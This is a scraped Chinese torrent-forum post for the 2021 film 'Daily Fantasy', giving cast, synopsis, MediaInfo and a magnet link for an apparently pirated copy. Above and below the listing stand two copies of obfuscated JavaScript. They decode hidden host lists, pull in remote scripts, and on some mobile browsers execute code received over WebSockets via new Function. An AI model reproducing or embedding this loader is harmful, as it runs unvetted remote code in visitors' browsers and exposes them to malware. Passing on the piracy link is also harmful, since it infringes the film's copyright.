日常幻想指南[国语配音/中文字幕].Daily.Fantasy.2021.WEB-DL.2160p.H265.AAC 1.22GB

版主小s 1月前 305

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 日常幻想指南 / Daily Fantasy

◎年 代 2021

◎产 地 中国大陆

◎类 别 喜剧 / 爱情 / 奇幻

◎语 言 汉语普通话

◎上映日期 2021-09-19(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt15465908/

◎豆瓣评分 5.0/10 (8379人评价)

◎豆瓣链接 https://movie.douban.com/subject/26823520/

◎片 长 98分钟

◎导 演 梁栋 Dong Liang (id:1359216)

◎编 剧 梁栋 Dong Liang (id:1359216)

◎演 员 王彦霖 Yanlin Wang (id:1350317)

焦俊艳 Junyan Jiao (id:1312818)

高捷 Jack Kao (id:1276076)

闵健 Jian Min (id:1365862)

罗辑 Ji Luo (id:1417084)

张子栋 Zi-Dong Zhang (id:1316364)

林更新 Gengxin Lin (id:1314535)

包贝尔 Bei'er Bao (id:1315866)

张海宇 Haiyu Zhang (id:1364842)

曾江 Kenneth Tsang (id:1275451)

阳蕾 Lei Yang (id:1453510)

张雪峰 Xuefeng Zhang (id:1396873)

大兵 Da Bing (id:1355030)

梁缘 Yuan Liang (id:1376841)

琥玛尔 (id:1417085)

霍文琦 Wenqi Huo (id:1448453)

孙伟 Wei Sun (id:1384466)

廖婧希 (id:1417317)

谢征宇 Zhengyu Xie (id:1397414)

孙要兵 (id:1417086)

张晓兵 Xiaobing Zhang (id:1355736)

付雷 Lei Fu (id:1417087)

焦磊 (id:1417088)

◎标 签 喜剧 / 奇幻 / 超能力 / 中国大陆 / 2021 / 漫画改编 / 国产 / 剧情

◎简 介

改编自网络同名人气连载漫画,电影讲述了男主角阿震(王彦霖 饰)在一次意外后竟获得了和静物沟通的超能力,这个能力让他的生活发生了翻天覆地的变化,就在这时阿震重逢了学生时代的初恋草莓(焦俊艳 饰)……生活陷入混乱的阿震为了回归原本的生活,与静物们展开了一段精彩故事……

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 日常幻想指南[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 1.22 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 1 782 kb/s

  11. Writing application : Lavf58.29.100


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : hev1

  18. Codec ID/Info : High Efficiency Video Coding

  19. Duration : 1 h 38 min

  20. Bit rate : 1 650 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 608 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Variable

  25. Frame rate : 24.000 FPS

  26. Minimum frame rate : 23.994 FPS

  27. Maximum frame rate : 24.006 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Bits/(Pixel*Frame) : 0.011

  32. Stream size : 1.13 GiB (93%)

  33. Codec configuration box : hvcC


  34. Audio

  35. ID : 2

  36. Format : AAC LC

  37. Format/Info : Advanced Audio Codec Low Complexity

  38. Codec ID : mp4a-40-2

  39. Duration : 1 h 38 min

  40. Bit rate mode : Variable

  41. Bit rate : 125 kb/s

  42. Maximum bit rate : 149 kb/s

  43. Channel(s) : 2 channels

  44. Channel layout : L R

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 46.875 FPS (1024 SPF)

  47. Compression mode : Lossy

  48. Stream size : 88.1 MiB (7%)

  49. Default : Yes

  50. Alternate group : 1




复制代码


TAGS 奇幻 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:C2661BA7EE2DB5EF14B57494A4463873AEE42A8B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};